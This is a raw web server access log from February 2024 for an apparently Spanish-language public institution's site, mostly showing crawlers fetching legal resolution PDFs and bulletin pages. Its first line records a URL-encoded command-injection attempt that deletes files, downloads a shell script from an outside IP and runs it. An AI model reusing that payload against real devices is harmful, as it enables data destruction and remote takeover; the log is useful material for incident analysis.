172.22.2.4 - - [19/Feb/2024:00:52:28 -0500] "GET /BLA/boletinlegal/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F204.76.203.111%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
216.244.66.195 - - [19/Feb/2024:00:52:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0329.pdf HTTP/1.1" 200 494800
172.22.2.4 - - [19/Feb/2024:00:51:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [19/Feb/2024:00:53:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0676.pdf HTTP/1.1" 200 334149
216.244.66.195 - - [19/Feb/2024:00:54:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/2194.pdf HTTP/1.1" 200 624116
172.22.2.4 - - [19/Feb/2024:00:52:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60371
216.244.66.195 - - [19/Feb/2024:00:55:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/3402.pdf HTTP/1.1" 200 1724956
216.244.66.195 - - [19/Feb/2024:00:55:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/4960.pdf HTTP/1.1" 200 610736
168.119.253.13 - - [19/Feb/2024:00:56:16 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [19/Feb/2024:00:56:35 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [19/Feb/2024:00:56:44 -0500] "GET /BLA/resoluciones/AUTOS%202023/1973.pdf HTTP/1.1" 200 406666
216.244.66.195 - - [19/Feb/2024:00:57:35 -0500] "GET /BLA/resoluciones/AUTOS%202023/2250.pdf HTTP/1.1" 200 316581
52.167.144.194 - - [19/Feb/2024:00:57:36 -0500] "GET /pdc/actos/811.pdf HTTP/1.1" 304 -
216.244.66.195 - - [19/Feb/2024:00:58:26 -0500] "GET /BLA/resoluciones/AUTOS%202023/2266.pdf HTTP/1.1" 200 585632
216.244.66.195 - - [19/Feb/2024:00:59:16 -0500] "GET /BLA/resoluciones/AUTOS%202023/2307.pdf HTTP/1.1" 200 9543484
172.22.2.4 - - [19/Feb/2024:00:57:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.102.90.5 - - [19/Feb/2024:00:59:38 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/1oQ5UM32f1CAI7JB5eCBebiIQ3qmeNoni6pHau3EAmNt45ikqDHiUwf5OeEKx7x22caIab+HJwrWFqmJb8xkir3SiBoZ7WfUuBYgAfPxvSdi1YkVX2q/YUxcH1RsMbhn5QfkAks9vgEFitXiv7mIu/XL5e3vCcMPgxY+FH3r0GDXrvE1Cx0Bf3lYZSs3LmJAapV0+4zWeb/phvme0PEGI+RxVRDi3Fcb/p53ar3CJBC667l+t0Jc09q9k6cjKkOBMAzTyd63dvA==&u=U2FsdGVkX18kGOEC/LndOKJna9A8vHDYPMhRQd1ccb0=&y=U2FsdGVkX1/s3LNCeQWBZ2W1iRRvLxX64zjCh+r/22M+ZkUUhinTj4OjQcoauuEW HTTP/1.1" 200 70
216.244.66.195 - - [19/Feb/2024:01:00:06 -0500] "GET /BLA/resoluciones/AUTOS%202023/2615.pdf HTTP/1.1" 200 1307413
172.22.2.4 - - [19/Feb/2024:00:58:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
186.102.90.5 - - [19/Feb/2024:01:00:14 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19bqNMmdjaIGFEaPUJ0gTZ/1abxAkwxJbCX2CrlnELaC8QZPlYS1mb9kQBdnsZKK9Tu1NfccrVgaatP57DYKoDYfM5kVgdHln4fbPr5LuKtPY48I9DsifFUZaODFkHcYfNLM9I8li6EE1s594yMlDm5W56+JSVmfIb0crdIUO66QMampFXVj3C45m2sfdPs33X53xX5wgAlIecyVt7+HFnfj2TJjfi8ZXWCokgfMHeoWTN1wrLt8itqhRvlhF6RkjLu+4h6LWjtug==&u=U2FsdGVkX18kGOEC/LndOKJna9A8vHDYPMhRQd1ccb0=&y=U2FsdGVkX1/s3LNCeQWBZ2W1iRRvLxX64zjCh+r/22M+ZkUUhinTj4OjQcoauuEW HTTP/1.1" 200 26
186.102.90.5 - - [19/Feb/2024:01:00:15 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX18kGOEC/LndOKJna9A8vHDYPMhRQd1ccb0=&y=U2FsdGVkX1/s3LNCeQWBZ2W1iRRvLxX64zjCh+r/22M+ZkUUhinTj4OjQcoauuEW HTTP/1.1" 200 26
186.102.90.5 - - [19/Feb/2024:01:00:15 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19r2+NqKwxA8e2o8NX5ogEaEfcXP6o2jgDApA9lTyGq6GBWwpFZkGTcPQnL86nOS4gWsaXJt0oAAs93iMbeUEbb45XAFUjnpum56v7V+2JlwryPPxhJJ7Ec1QDp6787tOHXElEnkpF4olabv7hB/MmpIL/rmGx95Dw=&u=U2FsdGVkX18kGOEC/LndOKJna9A8vHDYPMhRQd1ccb0=&y=U2FsdGVkX1/s3LNCeQWBZ2W1iRRvLxX64zjCh+r/22M+ZkUUhinTj4OjQcoauuEW HTTP/1.1" 200 26
186.102.90.5 - - [19/Feb/2024:01:00:15 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX192TpGITTJN2Bi8QetWfT56CMDxyuCV6Bt9xpmahjngq3TXUisgaHsnhRyg2GeUmI8UY1Vl5SGmGzocx/A758elBCuReX/Liy5o+K87EGZbrOaow+Zu7ipf9dsLhJLjK4LsLHct6rZYwc3t5j/IzAqFjWA3giStseA=&u=U2FsdGVkX18kGOEC/LndOKJna9A8vHDYPMhRQd1ccb0=&y=U2FsdGVkX1/s3LNCeQWBZ2W1iRRvLxX64zjCh+r/22M+ZkUUhinTj4OjQcoauuEW HTTP/1.1" 200 26
186.102.90.5 - - [19/Feb/2024:01:00:15 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19j6zZuPkPMWaX8mZk+6WPfPZCp6OI96U0XS/50Dk1T6Gfx0IWN1XFzdPKTNvyLJ9tPQxa40s+YQ+1COSg2Hbhym4JZTWrKHyjiTiVkV+QEAvl17k4k+p5s/SFfjkLEUCTQRvLkzd0CaOA5Id1sMuCfo6jXDXIQiog=&u=U2FsdGVkX18kGOEC/LndOKJna9A8vHDYPMhRQd1ccb0=&y=U2FsdGVkX1/s3LNCeQWBZ2W1iRRvLxX64zjCh+r/22M+ZkUUhinTj4OjQcoauuEW HTTP/1.1" 200 26
186.102.90.5 - - [19/Feb/2024:01:00:16 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+c4a0ecoxtm7IjylbSv6GERnEexeB/bCdNNqCog7DoUl4Hjo0i5YbaE6/CgoWMzjfjmaOGlE4+yvo1rAMAyXH0RJESF/yHuX5Nxgu3iJfxpS2MpELCB+HgTXM36y1r1KLR7XfzHXbFx1aq+sJAr93A37W0mF568Te2vBRxBeqphf9ZWi484Wum+N+vlntIzt0NEPxgzsG5Dg==&u=U2FsdGVkX18kGOEC/LndOKJna9A8vHDYPMhRQd1ccb0=&y=U2FsdGVkX1/s3LNCeQWBZ2W1iRRvLxX64zjCh+r/22M+ZkUUhinTj4OjQcoauuEW HTTP/1.1" 200 26
216.244.66.195 - - [19/Feb/2024:01:00:59 -0500] "GET /BLA/resoluciones/AUTOS%202023/2622.pdf HTTP/1.1" 200 1174284
216.245.221.92 - - [19/Feb/2024:01:01:35 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [19/Feb/2024:01:01:50 -0500] "GET /BLA/resoluciones/AUTOS%202023/3170.pdf HTTP/1.1" 200 891609
216.244.66.195 - - [19/Feb/2024:01:02:41 -0500] "GET /BLA/resoluciones/AUTOS%202023/3431.pdf HTTP/1.1" 200 408291
52.167.144.140 - - [19/Feb/2024:01:03:22 -0500] "GET /silvicultura/9.pdf HTTP/1.1" 304 -
216.244.66.195 - - [19/Feb/2024:01:03:27 -0500] "GET /BLA/resoluciones/AUTOS%202023/3824.pdf HTTP/1.1" 200 2698224
216.244.66.195 - - [19/Feb/2024:01:04:18 -0500] "GET /BLA/resoluciones/AUTOS%202014/1554.pdf HTTP/1.1" 200 646641
216.244.66.195 - - [19/Feb/2024:01:05:08 -0500] "GET /BLA/resoluciones/AUTOS%202014/1988.pdf HTTP/1.1" 200 127776
172.22.2.4 - - [19/Feb/2024:01:03:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.95.117 - - [19/Feb/2024:01:05:32 -0500] "GET /images/Acuerdos%2001%20(1)%20(1).jpeg HTTP/1.1" 200 32884
216.244.66.195 - - [19/Feb/2024:01:05:48 -0500] "GET /BLA/resoluciones/AUTOS%202018/1007.pdf HTTP/1.1" 200 595628
199.16.157.183 - - [19/Feb/2024:01:05:55 -0500] "GET /images/cr%C3%B3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
172.22.2.4 - - [19/Feb/2024:01:04:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
216.245.221.92 - - [19/Feb/2024:01:06:35 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [19/Feb/2024:01:06:38 -0500] "GET /BLA/resoluciones/AUTOS%202018/3739.pdf HTTP/1.1" 200 274972
216.244.66.195 - - [19/Feb/2024:01:07:20 -0500] "GET /BLA/resoluciones/AUTOS%202018/5811.pdf HTTP/1.1" 200 279606
66.249.66.19 - - [19/Feb/2024:01:07:56 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%2000018%20del%2020%20de%20noviembre%20de%202019.pdf HTTP/1.1" 200 158030
66.249.66.20 - - [19/Feb/2024:01:07:57 -0500] "GET /BLA/boletinlegal/Circulares/2018/Circular%20No.%200015%20del%207%20de%20Diciembre%20de%202018.pdf HTTP/1.1" 200 165305
52.167.144.161 - - [19/Feb/2024:01:07:59 -0500] "GET /Publicaciones/2023EE305777.pdf HTTP/1.1" 404 228
216.244.66.195 - - [19/Feb/2024:01:08:02 -0500] "GET /BLA/resoluciones/AUTOS%202019/0857.pdf HTTP/1.1" 200 265623
216.244.66.195 - - [19/Feb/2024:01:08:41 -0500] "GET /BLA/resoluciones/AUTOS%202020/0396.pdf HTTP/1.1" 200 249516
216.244.66.195 - - [19/Feb/2024:01:09:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0302.pdf HTTP/1.1" 200 757227
34.133.62.186 - - [19/Feb/2024:01:09:53 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110175
216.244.66.195 - - [19/Feb/2024:01:10:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0494.pdf HTTP/1.1" 200 787702
216.244.66.195 - - [19/Feb/2024:01:10:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0536.pdf HTTP/1.1" 200 342642
172.22.2.4 - - [19/Feb/2024:01:09:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [19/Feb/2024:01:11:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/4090.pdf HTTP/1.1" 200 633569
216.245.221.92 - - [19/Feb/2024:01:11:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Feb/2024:01:10:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58711
216.244.66.195 - - [19/Feb/2024:01:12:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/4316.pdf HTTP/1.1" 200 957888
216.244.66.195 - - [19/Feb/2024:01:12:49 -0500] "GET /BLA/resoluciones/AUTOS%202022/2454.pdf HTTP/1.1" 200 496011
216.244.66.195 - - [19/Feb/2024:01:13:21 -0500] "GET /BLA/resoluciones/AUTOS%202023/0039.pdf HTTP/1.1" 200 416058
216.244.66.195 - - [19/Feb/2024:01:13:53 -0500] "GET /BLA/resoluciones/AUTOS%202023/0148.pdf HTTP/1.1" 200 399891
216.244.66.195 - - [19/Feb/2024:01:14:25 -0500] "GET /BLA/resoluciones/AUTOS%202023/0243.pdf HTTP/1.1" 200 785750
186.102.90.5 - - [19/Feb/2024:01:14:43 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX1/zC9TizJPSa9U4rWlg9ZqFy+9qscjNmUnuEbob5kmby7mDiM+kuy2HK6P8nw55thjKfBiFsSvpJ/+ly4Id1k9cySo7Lo/y9EanLei87Oyxua+uvduKGJwmj3fKiHf7ZQs3TbnznpHWm4KNS5relPFGn6IwiuZ3v/0=&u=U2FsdGVkX18kGOEC/LndOKJna9A8vHDYPMhRQd1ccb0=&y=U2FsdGVkX1/s3LNCeQWBZ2W1iRRvLxX64zjCh+r/22M+ZkUUhinTj4OjQcoauuEW HTTP/1.1" 200 60
216.244.66.195 - - [19/Feb/2024:01:15:05 -0500] "GET /BLA/resoluciones/AUTOS%202023/0742.pdf HTTP/1.1" 200 372344
216.244.66.195 - - [19/Feb/2024:01:15:36 -0500] "GET /BLA/resoluciones/AUTOS%202023/0751.pdf HTTP/1.1" 200 2245645
216.244.66.195 - - [19/Feb/2024:01:16:16 -0500] "GET /BLA/resoluciones/AUTOS%202023/0855.pdf HTTP/1.1" 200 544507
216.245.221.92 - - [19/Feb/2024:01:16:35 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [19/Feb/2024:01:16:48 -0500] "GET /BLA/resoluciones/AUTOS%202023/1331.pdf HTTP/1.1" 200 423808
172.22.2.4 - - [19/Feb/2024:01:15:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [19/Feb/2024:01:17:17 -0500] "GET /BLA/resoluciones/AUTOS%202023/1481.pdf HTTP/1.1" 200 621720
172.22.2.4 - - [19/Feb/2024:01:16:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
216.244.66.195 - - [19/Feb/2024:01:17:49 -0500] "GET /galeria/galeria/fotos/JEICA.jpg HTTP/1.1" 200 2288790
201.245.192.253 - - [19/Feb/2024:01:19:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39124
201.245.192.253 - - [19/Feb/2024:01:19:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38182
201.245.192.253 - - [19/Feb/2024:01:19:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39146
201.245.192.253 - - [19/Feb/2024:01:20:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39146
216.245.221.92 - - [19/Feb/2024:01:21:35 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.10 - - [19/Feb/2024:01:22:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/3134.pdf HTTP/1.1" 304 -
172.22.2.4 - - [19/Feb/2024:01:20:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Feb/2024:01:21:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
216.244.66.195 - - [19/Feb/2024:01:24:18 -0500] "GET /robots.txt HTTP/1.1" 404 1018
172.22.2.4 - - [19/Feb/2024:01:24:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61437
216.245.221.92 - - [19/Feb/2024:01:26:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Feb/2024:01:26:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Feb/2024:01:26:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [19/Feb/2024:01:29:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39124
172.22.2.4 - - [19/Feb/2024:01:27:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53809
201.245.192.253 - - [19/Feb/2024:01:29:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38182
201.245.192.253 - - [19/Feb/2024:01:29:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39146
201.245.192.253 - - [19/Feb/2024:01:29:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39146
216.245.221.92 - - [19/Feb/2024:01:31:35 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.198 - - [19/Feb/2024:01:33:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1442.pdf HTTP/1.1" 200 1986511
172.22.2.4 - - [19/Feb/2024:01:32:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Feb/2024:01:33:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
216.244.66.195 - - [19/Feb/2024:01:35:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/2354.pdf HTTP/1.1" 200 393853
216.244.66.195 - - [19/Feb/2024:01:36:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/2555.pdf HTTP/1.1" 200 460227
216.245.221.92 - - [19/Feb/2024:01:36:35 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [19/Feb/2024:01:37:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/2678.pdf HTTP/1.1" 200 376471
40.77.167.36 - - [19/Feb/2024:01:37:19 -0500] "GET /BLA/resoluciones/AUTOS%202022/5749.pdf HTTP/1.1" 304 -
71.6.232.26 - - [19/Feb/2024:01:37:21 -0500] "GET / HTTP/1.1" 200 319
216.244.66.195 - - [19/Feb/2024:01:37:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/2767.pdf HTTP/1.1" 200 462865
216.244.66.195 - - [19/Feb/2024:01:38:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/3062.pdf HTTP/1.1" 200 399511
40.77.167.36 - - [19/Feb/2024:01:39:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3833.pdf HTTP/1.1" 200 443946
201.245.192.253 - - [19/Feb/2024:01:39:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39124
52.167.144.23 - - [19/Feb/2024:01:39:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/02840.pdf HTTP/1.1" 200 9491886
216.244.66.195 - - [19/Feb/2024:01:39:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/3692.pdf HTTP/1.1" 200 377691
201.245.192.253 - - [19/Feb/2024:01:39:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38182
201.245.192.253 - - [19/Feb/2024:01:39:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39146
201.245.192.253 - - [19/Feb/2024:01:39:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39146
172.22.2.4 - - [19/Feb/2024:01:38:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [19/Feb/2024:01:40:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/4210.pdf HTTP/1.1" 200 378883
172.22.2.4 - - [19/Feb/2024:01:39:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60371
216.244.66.195 - - [19/Feb/2024:01:41:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/4517.pdf HTTP/1.1" 200 376044
216.245.221.92 - - [19/Feb/2024:01:41:35 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [19/Feb/2024:01:41:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0134.pdf HTTP/1.1" 200 334891
152.61.128.50 - - [19/Feb/2024:01:42:03 -0500] "GET / HTTP/1.1" 200 319
216.244.66.195 - - [19/Feb/2024:01:42:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0218.pdf HTTP/1.1" 200 335710
216.244.66.195 - - [19/Feb/2024:01:43:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0452.pdf HTTP/1.1" 200 407029
216.244.66.195 - - [19/Feb/2024:01:44:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0464.pdf HTTP/1.1" 200 406178
216.244.66.195 - - [19/Feb/2024:01:45:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/1237.pdf HTTP/1.1" 200 335926
216.244.66.195 - - [19/Feb/2024:01:45:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/1436.pdf HTTP/1.1" 200 494620
172.22.2.4 - - [19/Feb/2024:01:44:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [19/Feb/2024:01:46:35 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [19/Feb/2024:01:46:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/1685.pdf HTTP/1.1" 200 2511039
172.22.2.4 - - [19/Feb/2024:01:45:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
34.133.62.186 - - [19/Feb/2024:01:46:50 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110175
162.55.41.96 - - [19/Feb/2024:01:46:51 -0500] "GET / HTTP/1.1" 200 4720
216.244.66.195 - - [19/Feb/2024:01:47:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/3840.pdf HTTP/1.1" 200 378764
216.244.66.195 - - [19/Feb/2024:01:48:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/4514.pdf HTTP/1.1" 200 353706
172.22.2.4 - - [19/Feb/2024:01:48:19 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%2000018%20del%2020%20de%20noviembre%20de%202019.pdf HTTP/1.1" 304 -
216.244.66.195 - - [19/Feb/2024:01:49:06 -0500] "GET /BLA/resoluciones/AUTOS%202023/2603.pdf HTTP/1.1" 200 1395677
40.77.167.16 - - [19/Feb/2024:01:49:23 -0500] "GET /bla/resoluciones/resoluciones%202012/1876.pdf HTTP/1.1" 200 423682
216.244.66.195 - - [19/Feb/2024:01:49:56 -0500] "GET /BLA/resoluciones/AUTOS%202023/2881.pdf HTTP/1.1" 200 1362582
216.244.66.195 - - [19/Feb/2024:01:50:49 -0500] "GET /BLA/resoluciones/AUTOS%202023/0118.pdf HTTP/1.1" 200 1885114
216.245.221.92 - - [19/Feb/2024:01:51:35 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [19/Feb/2024:01:51:39 -0500] "GET /BLA/resoluciones/AUTOS%202023/0432.pdf HTTP/1.1" 200 394909
172.22.2.4 - - [19/Feb/2024:01:50:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [19/Feb/2024:01:52:25 -0500] "GET /BLA/resoluciones/AUTOS%202023/0652.pdf HTTP/1.1" 200 654798
172.22.2.4 - - [19/Feb/2024:01:50:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58711
216.244.66.195 - - [19/Feb/2024:01:53:15 -0500] "GET /BLA/resoluciones/AUTOS%202023/0689.pdf HTTP/1.1" 200 660439
216.244.66.195 - - [19/Feb/2024:01:54:05 -0500] "GET /BLA/resoluciones/AUTOS%202023/0916.pdf HTTP/1.1" 200 913192
34.133.62.186 - - [19/Feb/2024:01:54:34 -0500] "GET / HTTP/1.1" 200 319
216.244.66.195 - - [19/Feb/2024:01:54:55 -0500] "GET /BLA/resoluciones/AUTOS%202023/1237.pdf HTTP/1.1" 200 397410
216.244.66.195 - - [19/Feb/2024:01:55:40 -0500] "GET /BLA/resoluciones/AUTOS%202023/1299.pdf HTTP/1.1" 200 859288
216.244.66.195 - - [19/Feb/2024:01:56:30 -0500] "GET /BLA/resoluciones/AUTOS%202023/4046.pdf HTTP/1.1" 200 1580921
216.245.221.92 - - [19/Feb/2024:01:56:35 -0500] "HEAD / HTTP/1.1" 200 -
5.139.66.62 - - [19/Feb/2024:01:56:40 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
5.139.66.62 - - [19/Feb/2024:01:56:40 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
5.139.66.62 - - [19/Feb/2024:01:56:38 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110175
5.139.66.62 - - [19/Feb/2024:01:56:39 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
5.139.66.62 - - [19/Feb/2024:01:56:40 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
5.139.66.62 - - [19/Feb/2024:01:56:40 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
5.139.66.62 - - [19/Feb/2024:01:56:40 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
5.139.66.62 - - [19/Feb/2024:01:56:40 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
5.139.66.62 - - [19/Feb/2024:01:56:40 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
